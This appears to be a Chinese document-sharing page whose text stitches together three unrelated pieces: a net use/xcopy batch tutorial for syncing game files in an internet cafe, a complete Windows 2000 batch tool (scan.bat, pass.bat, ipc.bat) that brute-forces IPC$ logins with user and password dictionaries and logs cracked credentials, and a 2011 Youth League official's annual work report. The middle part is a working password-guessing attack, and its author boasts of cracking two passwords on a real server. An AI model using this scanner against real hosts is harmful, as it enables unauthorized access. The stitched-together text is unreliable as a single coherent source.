net命令应用.docx

net命令应用.docx

《net命令应用.docx》由会员分享，可在线阅读，更多相关《net命令应用.docx（8页珍藏版）》请在冰豆网上搜索。

net命令应用

net命令应用

现在大家都希望有个同步软件可以达到网络目录或者文件的更新来减少自己的工作量,现在网络上也有很多软件可以达到这个目的,象同步专家之类的,但是这些软件需要安装服务端和客户端,客户端要常驻才能使用,并且占用了一定的资源.如下这个批处理利用net命令来进行文件和目录的同步更新.优点就是任何机器都可以做服务器和客户机,而且不占用任何资源.当然缺点也有就是写批处理有点烦^^.

我首先写出批处理，然后作详细的解释：

netuseS:

\\computer-01\D

attrib-s-h-rS:

\ghostC:

\WINDOWS\COMMAND\Xcopy.exe/s/e/yD:

\ghostS:

\ghost

netuse*/delete

netuseS:

\\computer-02\D

attrib-s-h-rS:

\ghost

C:

\WINDOWS\COMMAND\Xcopy.exe/s/e/yD:

\ghostS:

\ghost

netuse*/delete

   写说明一下net命令的用法，这里采用net命令其中一个参数netuse，如果对其他有兴趣，可以在command窗口打net/？

显示其help屏幕。

参数netuse

作用：

连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式：

netuse［devicename|*］［computernamesharename［volume］］［password|*］］［/user:

［domainname］username］［［/delete］|［/persistent:

{yes|no}］］

参数介绍：

键入不带参数的netuse列出网络连接。

devicename指定要连接到的资源名称或要断开的设备名称。

computernamesharename服务器及共享资源的名称。

password访问共享资源的密码。

*提示键入密码。

/user指定进行连接的另外一个用户。

domainname指定另一个域。

username指定登录的用户名。

/home将用户连接到其宿主目录。

/delete取消指定网络连接。

/persistent控制永久网络连接的使用。

如下是简单的例子说明：

（1）netusee:

YFANGTEMP将YFANGTEMP目录建立为E盘

（2）netusee:

YFANGTEMP/delete断开连接

这里我只写两行批处理，用意这两大行网络标识是不同的，其他可以依次类推。

我的网吧网络标识是computer－01～computer－N也就是网吧电脑的网络名称，可以根据自己实际情况更改。

譬如user01～userXX

开始解释每行命令，实际应用稍后解释。

一．命令解析。

useS:

\\computer-01\D（将computer－01的共享盘d盘进行网络连接，并映射成网络驱动盘s盘。

这里d盘要做完全共享，如果不是完全共享文件就复制不过去了，到时不要耍菜刀追我^^。

提示1：

如果怕完全共享被人将文件删除，可以设完全共享密码。

假设远程共享盘完全共享密码为123，那么这行命令改成如下：

netuseS:

\\computer-01\D123。

这样访问远程客户机共享盘就没有问题了。

提示2：

这里为什么要选d盘而不是e盘c盘，是要和同步更新的服务机的盘符对应起来，我要复制本地机d盘下的东西，当然要和d盘对应。

）

2.attrib-s-h-rS:

\ghost\（把目标盘下要复制的目标目录下的文件属性（只读、隐藏、系统）三项去掉。

提示：

如果目标盘没有ghost目录接下来的xcopy命令会自动创建的）

3.C:

\WINDOWS\COMMAND\Xcopy.exe/y/s/eD:

\ghostS:

\ghost\（将本地机的d盘下的ghost目录下文件复制到虚拟映射盘s盘下ghost目录，这里的s盘就是computer－01上的d盘。

提示1：

s盘在执行第一大行后会自动消失，当执行第二大行时computer－02的d盘被虚拟映射成s盘；提示2：

/s/e参数含义指把ghost下所有子目录包括空目录全部复制。

/y自动覆盖已有文件）

4.netuse*/delete（断开所有连接）

2.实际应用

1.共享盘目录的更新：

比方现在头痛的传奇，我统一安装在d盘的netgames下的mir目录。

把d盘完全共享并设置共享密码为****。

当要更新文件和外挂文件时，外挂文件也是放在mir目录下的。

这样先调试好一台电脑然后写出如下命令并执行。

netuseS:

\\computer-01\D****

attrib-s-h-rS:

\netgames\mir

C:

\WINDOWS\COMMAND\Xcopy.exeD:

\netgames\mirS:

\netgames\mir

netuse*/delete

提示：

1。

这里没有用/s/e就是只复制mir根目录下的文件而不复制整个目录

2.我们也可以在xcopy前插入一句C:

\WINDOWS\COMMAND\del/yS:

\netgames\mir\*.*

把mir下的文件删除干净后再复制。

保险起见可以不写。

3.\\computer-01可以依次类推写下去，如computer－02－03－04.....

2.共享目录的更新

上述我们把传奇目录下文件和外挂更新好后，但是出现一个问题。

网管软件的桌面图标没有同步更新，好事作到底，上次我们是把整个盘符作了完全共享，这次我们只把一个目录完全共享并设置密码****。

因为我用的是pubwin4网管软件，安装c盘，为了安全起见，还是只共享文件夹，而不是整个盘。

Pubwin的桌面快捷方式安装在c盘的programfiles的hitsoft下，将hitsoft完全共享即可，传奇和传奇外挂快捷方式放在目录下的netgames下。

批处理如下

netuseS:

\\computer-01\hitsoft****

attrib-s-h-rS:

\netgames

C:

\WINDOWS\COMMAND\Xcopy.exec:

\program~1\hitsoft\netgamesS:

\netgames/s/y/e

netuse*/delete

Win2k命令行下自做弱口令扫描器

批处理文件test.bat

-------------------

@echooff

echo格式：

test*.*.*>test.txt

for/L%%Gin（11254）doecho%1.%%G>>test.txt&netuse\%1.%%Gipc$""/use:

"Administrator"|find"命令成功完成">>test.txt

这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接，如果成功就把结果记录在test.txt。

短短173字节，就实现了弱口令扫描的功能！

惊叹web_wolf思维之独到并感慨吾等菜鸟何日能成正果之时，不禁也有所悟：

win2k命令行命令也可以用来远程破解NT弱口令！

我们知道，在win2k命令行下有个for命令，其功能是对一组文件中的每一个文件执行某个特定命令，也就是可以用你指定的循环范围生成一系列命令。

For命令的格式为：

FOR%variableIN（set）DOcommand[command-parameters]

当然，for命令最强大的功能，表现在它的一些高级应用中。

譬如可以用/r参数遍历整个目录树；可以用/f参数将文本文件内容作为循环范围；可以用/f参数将某一命令执行结果作为循环范围等等。

在这里我不一一说明其用法，如果你不熟悉for命令，可以参考相关资料教程。

For命令应用最简单的例子，就是人工指定循环范围，然后对每个值执行指定的命令如果我们把密码做为循环值，把netuse命令作为指定命令。

那将会产生什么样的效果呢？

请看下面的命令：

for/l%iin（100,1,999）donetuse\ipipc$"%i"/user:

"username"

解释一下：

username是你用nbtstat得到的用户名，这条命令的功能是对指定username进行3位数纯数字密码依次尝试建立ipc连接，直到建立成功或者数字全部试完。

如果你网速够快的话，跑完这900个数字也需要多长时间。

也许你想到了，如果对方密码不是纯数字怎么办？

有办法！

我们还可以用字典，上面不是提到了可以用/f参数将文本文件内容作为循环范围吗？

for/f%iin（pass.txt）donetuse\ipipc$"%i"/user:

"username"

pass.txt是字典文件，其格式为一个密码占一行。

例如：

123

1234

12345

abc

abcd

这条命令的功能是对指定帐号username用密码字典pass.txt中的密码依次尝试建立ipc连接，直到建立成功或者密码全部试完。

可问题还是有，虽然这样我们碰巧是能连接成功，可我们仍然不知道密码啊，下次要用还得重新全部试过。

我们应该想办法把尝试成功的用户名和密码保存在指定文件才行啊！

以下是我实验后的结果，也许不是什么好方法，但是完全可以实现对指定ip扫描并且把结果保存在指定文件。

由于我们现在要实现的功能不是一句命令所能完成的，所以我们把所有命令写成批处理文件。

先提醒一下，在批处理文件中使用FOR命令时，指定变量使用%%variable,而不是%variable。

将下面内容存为scan.bat:

@echooff

echoWrittenByypy>>%4

echoEmail:

ypy_811@>>%4

echo--------------------------------->>%4

date/t>>%4

time/t>>%4

echo---->>%4

echoResult：

>>%4

start"scan…"/mincmd/cfor/f%%iin（%2）docallipc.bat%1"%%i"%3%4

exit

将下面内容存为ipc.bat:

netuse\%1ipc$%2/user:

"%3"

gotoresult%ERRORLEVEL%

:

result0

echoRemoteServer：

%1>>%4

echoUsername：

%3>>%4

echoPassword：

%2>>%4

echo---->>%4

netuse\%1ipc$/del

exit

:

result2

ipc.bat中的%ERRORLEVEL%表示取前一命令执行后的返回结果。

netuse命令成功完成返回0，失败返回2。

将scan.bat和ipc.bat存放于system32目录中，用法如下：

scan.bat主机密码字典文件用户名结果存放文件

例如：

scan.bat192.168.35.17d:

pass.txtadministratord:

esult.txt

密码破解出来之后，存放于d:

esult.txt里面。

我稍微解释一下扫描的原理，就是对帐号administrator用密码字典pass.txt中的密码依次尝试建立ipc连接，如果成功，则记录密码，不成功则试下一个密码。

可是细心的你肯定又发现问题了，这样只能指定用户名啊？

如果我用nbtstat探测到了十几个用户，就需要打十几遍命令？

既然我们可以从指定文件中循环取密码，那我们也可以从另一指定文件中循环取用户名啊，让我们再来修改一下：

将下面内容存为scan.bat:

@echooff

echo--------------------------------->>%4

echoWrittenByypy>>%4

echoEmail:

ypy_811@>>%4

echo--------------------------------->>%4

date/t>>%4

time/t>>%4

echoResult：

>>%4

echo---->>%4

start"scan..."/mincmd/cfor/f%%iin（%3）docallpass.bat%1%2"%%i"%4

exit

将下面内容存为pass.bat:

start"scan..."/mincmd/cfor/f%%iin（%2）docallipc.bat%1"%%i"%3%4

下面内容存为ipc.bat:

netuse\%1ipc$%2/user:

"%3"

gotoresult%ERRORLEVEL%

:

result0

echoRemoteServer：

%1>>%4

echoUsername：

%3>>%4

echoPassword：

%2>>%4

echo---->>%4

netuse\%1ipc$/del

exit

:

result2

将scan.bat、pass.bat和ipc.bat存放于system32目录中，用法如下：

scan.bat主机密码字典文件用户字典文件结果存放文件

例如：

scan.bat192.168.35.17d:

pass.txtd:

user.txtd:

esult.txt

其中用户字典文件user.txt的内容是你用nbtstat探测到的所有用户名，其格式和密码字典文件一样，一个字符串占一行。

例如：

administrator

admin

ypy

这样扫描的原理是对用户字典user.txt中的每一个用户，同时用密码字典pass.txt中的密码依次尝试建立ipc连接，如果成功则记录用户名和密码，如果不成功就试下一个密码。

现在是不是有点对user.txt中的用户暴力跑ipc获得密码的味道啊？

呵呵。

我用这个简单弱口令扫描器挂了一个xkey做的字典扫一台有八个用户的win2kserver，还真扫出了两个密码！

而且速度很快！

好了，在Win2k命令行下简单做弱口令扫描器的方法就先介绍到这里，可能还有许多种更简单的方法能实现相同的功能，你可以去尝试一下。

事实上，当微软从win2k开始将命令行增强后，借鉴了相当多unix的优点，虽然还不至于像unix那么灵活，但可以实现的功能已相当之多。

写本文是希望起到介绍和抛砖引玉的效果。

所以没有实验更多功能，故给出几点说明：

1.不能对指定网段扫描。

2.此扫描原理是用帐号和密码循环建立ipc$连接,因此如果对方没开139端口或者删除了ipc$共享，那就不能工作了，呵呵。

3.扫描方式是用户字典中的用户名同时在挂密码字典跑ipc，由于不允许一个用户使用一个以上用户名与一台服务器或共享资源多重连接，导致有的的帐号密码本应该真确的可返回的结果为失败，所以有时候会漏报。

但是如果你的字典中帐好和密码至少有一对正确的话，那至少能记录一对正确结果。

4.文中所有例子在win2kserver和winxp上通过测试。

适应角色转变，扎实开展团的工作

———共青团铁东区委书记的述职报告

2011年是适应角色转变、思想进一步成熟的一年。

这一年，自己能够坚持正确的政治方向，紧紧围绕党的中心，立足本职岗位，较好地完成本线的工作任务。

自己政治觉悟、理论水平、思想素质、工作作风等各方面有了明显的进步和提高。

总的来说，收获很大，感触颇深。

一、以德为先，进一步提升个人思想素质

过去的一年，我以一个共产党员的标准，以一个团干部的标准严格要求自己，在个人的道德修养、党性锻炼、思想素质上有了很大的进步。

一是道德修养进一步提高。

作为一个团干部，我的一言一行、我的自身形象将直接影响到团委各成员，甚至更广大的青少年。

因此，在日常的工作和生活中，我每时每刻提醒自己，从小事做起，注重细节问题，做到干净做人、公正做事，以平常心看待自己的工作，要求自己在工作中诚实、守信、廉洁、自律，起好表率作用。

二是党性锻炼得到不断加强。

不断加强自己的党性锻炼，我严格按照《党章》和《中国共产党党员纪律处分条例》来要求和约束自己的行为，牢记党的宗旨，在团的工作中，以广大青少年的权益为出发点，务求时效。

三是政治思想素质不断提高。

一年来，我继续加强学习，积极参加理论中心组学习，经常自发利用休息时间学习，积极参加团省委组织赴井冈山革命传统与理想信念教育专题培训班、区委区政府组织赴清华大学县域经济培训班，通过“看、听、学、思”，进一步加深了对马列主义、毛泽东思想、邓小平理论、“三个代表”重要思想的理解，进一步系统掌握了党在农村的路线、方针、政策以及对共青团工作的要求。

特别是党的十七届六中全会以来，我通过学习原文、听专家讲课等，开拓了思想新境界，政治思想素质有了新的飞跃。

二、以能为先，进一步加强组织工作能力

在上级领导的信任和支持下，我本人也自加压力，抓住一切机会学习，注重与同事、与兄弟单位团委书记的交流，虚心请教，不耻下问，使各项工作都有序地开展。

一是工作的统筹安排能力不断加强。

我尽量做到工作提前一步，有计划、有安排、有预见性，保持思路清晰和决策的科学，力求操作有序，顺利开展。

二是工作的协调能力不断加强。

在工作中，我注重与上级的及时衔接、汇报，同时也注重与基层的交流沟通，听取多方意见和建议，从大局出发，对上做好配合，对下做好团结。

三是有创新地开展工作。

在工作中，我注重不断创新，使工作保持生机，使管理不断趋向人性化、合理化。

三、以勤为先，进一步提高团的业务水平

担任团委书记以来，认真了解情况、掌握知识，积极向团委领导、向前任书记学习、请教，了解团情、团史，努力掌握团的基本运作方式程序，便于更好地开展工作。

加强沟通了解，增加感情，深入基层，了解基层团组织和团员青年的有关情况，以“活动”来强化自己的知识和水平。

一年来，我立足以活动来促使自己尽快适应角色，迎接挑战。

今年五四，团区委以全区人居环境整治为依托，以“五四火炬传承九十二载生生不息，铁东青年投入人居环境立志强区”为引领，积极开展了“共青团路，红领巾街”，“铁东青年林”等一系列活动。

在活动中，增长了知识，深化了理解，使自己对团务工作有了全面的、系统的提高，为今后更好地提高团的业务水平打下了坚实的基础。

四、以绩为先，进一步完善团的组织建设

把《关于进一步深化“党建带团建”工作的实施意见》落到实处，把党的要求贯彻落实到团的建设中去，使团的建设纳入党的建设的总体规划。

依托党建，从政策层面来解决和落实基层团组织存在的问题和困难。

一是基层团干部的待遇问题。

积极争取党组织在团干部配备上的重视和支持，基层团干“转业”得到了很好的安排（叶赫的荣威，住建局遇良，卫生局王国宴等）；二是解决好基层团组织活动的经费问题。

积极争取专项，今年为每个乡镇街道从团省委争取经费三千元，共计三万六千元；三是团的基层组织格局创新工作。

按照“1＋4＋N”模式，通过换届调整选配了大批乡镇（街道）团干部，变原有的“团干部兼职”模式为现在的“兼职团干部”模式，提升了基层团组织的凝聚力和战斗力。

此次工作得到了团市委的充分认可，2011年四平市组织部班工作会议在我区召开。

以服务青年需求为目的，从单一组织青年开展活动转到生产环节，开展就业培训、创业交流、贫富结对；以服务党政中心为目的，发挥团组织自身优势，引导青年树立市场意识和投资意识，强化科技意识和参与意识，投身知识化、信息化和现代化、文明创建、环境整治、植绿护绿、社会治安等活动，把党政思路实践好。

突出做好当前新兴的农村、社区和非公经济组织建团工作，延长团的工作手臂，丰富团的组织形式。

先后与农联社、吉林银行等多家金融机构积极协调，为青年创业就业提供帮扶支持。

特别是吉林银行的“吉青时代”小额贷款项目更得到团省委的无偿贴息。

五、以廉为先，进一步保持清正廉明形象

作为新任职的年轻干部、党员干部，我既感受到了组织的信任与关怀，同时也感受到了责任重大。

我区在党委和政府的带领下，励精图治、奋发图强，取得了辉煌的成绩。

越是这种时候，就越需要我们这些干部保持清醒的头脑，保持共产党员的先进本色。

深知，作为一级干部，应该努力做到“清正廉洁”。

古人说“物必自腐而虫生”，腐败现象表现上看来是经济问题、道德问题，但深层次的原因却是理想信念出了问题。

要不断加强实践锻炼，要结合党的历史经验、改革开放和社会主义建设的实践以及自己的工作和思想实际，来刻苦磨炼自己。

勇于剖析自己，积极开展自我批评，净化自己的灵魂。

不断增强拒腐防变意识。

在思想上、在行动上、生活中争作表率。

在团区委开展“争做勤廉表率，竭诚服务青年”主题教育活动,召开机关党风廉政建设宣传教育活动动员会，全面启动党风廉政建设宣教活动。

按照学习贯彻区委、区纪委关于党风廉政建设和反腐败工作的部署和要求，学习党的十七届六中精神，强化组织领导，制定工作计划。

我们根据2011年党风廉政建设责任制考评要求，为了做好党风廉政建设和反腐败工作，成立了团区委党风廉政建设领导小组，并由我任组长。

按照“一岗双责”的责任要求，明确了单位正职领导作为第一责任人，每年约谈团干部一次，就有关廉洁从政个人“不准”和“禁止”行为适时对所管的团干部进行廉政谈话。

在2012年即将到来之际，共青团区委迎来组织部考核组，对共青团区委一年来的工作进的实地测评，感谢组织的帮助与关怀，今后我们更要自觉地接受组织的监督与考核。

铁东区的发展已经取得了令人瞩目的成就，而今又开始了新的征途。

广大青年有幸成为亲历者，成为追随者，同时我们也是共享发展成果的受益者。

我们应该心怀感恩，心存畏惧，“做一个组织和群众信赖的人，做一个同事和朋友敬重的人，做一个亲属子女可以引以为荣的人，做一个回顾人生能够问心无愧的人”。

我们要牢记党的宗旨，全面贯彻党的方针路线，高举中国特色社会主义伟大旗帜，弘扬“攻坚克难、求富图强”的四平精神，坚定不移的实施“五区”战略的发展规划，为建设富裕和谐新铁东的伟大目标而不懈奋斗。